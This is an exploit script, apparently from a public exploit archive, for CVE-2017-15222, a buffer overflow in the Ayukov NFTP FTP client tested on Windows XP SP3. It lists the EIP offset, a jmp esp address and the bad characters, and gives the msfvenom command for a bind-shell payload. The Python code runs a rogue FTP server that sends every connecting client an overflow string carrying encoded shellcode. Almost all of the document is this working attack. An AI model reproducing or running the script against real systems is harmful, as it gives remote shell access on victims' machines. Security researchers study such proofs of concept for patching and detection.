# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow # Date: 2018-12-29 # Exploit Author: Uday Mittal # Vendor Homepage: http://www.ayukov.com/nftp/ # Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip # Version : below 2.0 # Tested on: Microsoft Windows XP SP3 # CVE: CVE-2017-15222 # EIP Location: 4116 # Buffer starts from : 4121 # 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll) # badchars: '\x00\x0A\x0D\x40' # Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python import socket IP = '192.168.43.28' port = 21 buf = "" buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29" buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e" buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15" buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f" buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f" buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad" buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64" buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61" buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c" buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9" buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9" buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9" buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1" buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7" buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f" buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89" buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05" buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe" buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba" buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15" buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3" buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32" buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4" buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b" buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7" buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72" buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd" buf += "\xa4\x03\x5f\xc4" evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 + buf + "D"*10425 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((IP, port)) s.listen(20) print("[i] FTP Server started on port: "+str(port)+"\r\n") except: print("[!] Failed to bind the server to port: "+str(port)+"\r\n") while True: conn, addr = s.accept() conn.send('220 Welcome!' + '\r\n') print conn.recv(1024) conn.send('331 OK.\r\n') print conn.recv(1024) conn.send('230 OK.\r\n') print conn.recv(1024) conn.send(evil + '\r\n') print conn.recv(1024) conn.send('257' + '\r\n')